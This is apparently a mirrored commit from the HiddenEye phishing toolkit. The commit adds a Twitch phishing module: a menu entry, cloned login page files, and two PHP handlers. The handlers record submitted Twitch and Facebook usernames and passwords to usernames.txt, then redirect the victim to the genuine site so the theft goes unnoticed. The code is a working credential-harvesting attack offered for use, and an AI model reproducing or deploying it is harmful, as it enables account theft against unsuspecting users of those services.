mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge pull request #11 from usama7628674/master
Twitch added with facebook also included
This commit is contained in:
commit
0b07326b98
59
Server/www/index_files/JW5GlLnAsFw.html
Normal file
59
Server/www/index_files/JW5GlLnAsFw.html
Normal file
File diff suppressed because one or more lines are too long
200
Server/www/index_files/anchor.html
Normal file
200
Server/www/index_files/anchor.html
Normal file
File diff suppressed because one or more lines are too long
188
Server/www/index_files/bframe.html
Normal file
188
Server/www/index_files/bframe.html
Normal file
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
BIN
Server/www/index_files/payload
Normal file
BIN
Server/www/index_files/payload
Normal file
Binary file not shown.
After Width: | Height: | Size: 23 KiB |
1
Server/www/index_files/styles__ltr.css
Normal file
1
Server/www/index_files/styles__ltr.css
Normal file
File diff suppressed because one or more lines are too long
|
@ -101,6 +101,8 @@ def runPhishing(social, option2):
|
|||
system('cp WebPages/Snapchat_web/*.* Server/www/')
|
||||
elif social == 'Yahoo':
|
||||
system('cp WebPages/yahoo_web/*.* Server/www/')
|
||||
elif social == 'Twitch':
|
||||
system('cp WebPages/twitch/*.* Server/www/')
|
||||
elif option2 == '1' and social == 'Instagram':
|
||||
system('cp WebPages/Instagram_web/*.* Server/www/')
|
||||
elif option2 == '2' and social == 'Instagram':
|
||||
|
@ -175,7 +177,7 @@ def runPEnv():
|
|||
system('clear')
|
||||
print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL.YOU NEED A GOOD MIND AND SOUL TO BE ONE OF US. GET AWAY FROM HERE AND DO NOT COME BACK WITH SAME MOTIVE. GOOD BYE!{1} ]\n'.format(RED, END)
|
||||
exit(0)
|
||||
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} GitHub\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}[{1}8{0}]{1} Instagram\n\n {0}[{1}9{0}]{1} Snapchat\n\n {0}[{1}10{0}]{1} Yahoo\n\n {0}[{1}11{0}]{1} Twitch\n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED With An0nUD4Y !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
if option == '1':
|
||||
loadModule('Facebook')
|
||||
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n\n {0}[{1}3{0}]{1} Facebook Phishing- Mobile Version(mobile_mode)\n\n {0}[{1}4{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n\n {0}[{1}5{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n\n {0}[{1}----->{0}]{1} More Phising Scripts COMMING SOON ! STAY TUNED !\n\n {0}SF-An0nUD4Y > {1}".format(CYAN, END))
|
||||
|
@ -215,7 +217,11 @@ def runPEnv():
|
|||
elif option == '10':
|
||||
loadModule('Yahoo')
|
||||
option2 = ''
|
||||
runPhishing('Yahoo', option2)
|
||||
runPhishing('Yahoo', option2)
|
||||
elif option == '11':
|
||||
loadModule('Twitch')
|
||||
option2 = ''
|
||||
runPhishing('Twitch', option2)
|
||||
else:
|
||||
exit(0)
|
||||
|
||||
|
|
17
WebPages/twitch/Facebook.html
Normal file
17
WebPages/twitch/Facebook.html
Normal file
File diff suppressed because one or more lines are too long
126
WebPages/twitch/index.html
Normal file
126
WebPages/twitch/index.html
Normal file
File diff suppressed because one or more lines are too long
59
WebPages/twitch/index_files/JW5GlLnAsFw.html
Normal file
59
WebPages/twitch/index_files/JW5GlLnAsFw.html
Normal file
File diff suppressed because one or more lines are too long
200
WebPages/twitch/index_files/anchor.html
Normal file
200
WebPages/twitch/index_files/anchor.html
Normal file
File diff suppressed because one or more lines are too long
188
WebPages/twitch/index_files/bframe.html
Normal file
188
WebPages/twitch/index_files/bframe.html
Normal file
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
BIN
WebPages/twitch/index_files/payload
Normal file
BIN
WebPages/twitch/index_files/payload
Normal file
Binary file not shown.
After Width: | Height: | Size: 23 KiB |
1
WebPages/twitch/index_files/styles__ltr.css
Normal file
1
WebPages/twitch/index_files/styles__ltr.css
Normal file
File diff suppressed because one or more lines are too long
14
WebPages/twitch/login.php
Normal file
14
WebPages/twitch/login.php
Normal file
|
@ -0,0 +1,14 @@
|
|||
<?php
|
||||
$var = $_POST['twitch_user'];
|
||||
$var2 = $_POST['twitch_pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[Twitch-EMAIL]: " . $var . " [Twitch-PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://twitch.tv/login');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
exit();
|
||||
?>
|
14
WebPages/twitch/post.php
Normal file
14
WebPages/twitch/post.php
Normal file
|
@ -0,0 +1,14 @@
|
|||
<?php
|
||||
$var = $_POST['fb_email'];
|
||||
$var2 = $_POST['fb_pass'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[FB-EMAIL]: " . $var . " [FB-PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://twitch.tv/');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
}
|
||||
exit();
|
||||
?>
|
Loading…
Reference in New Issue
Block a user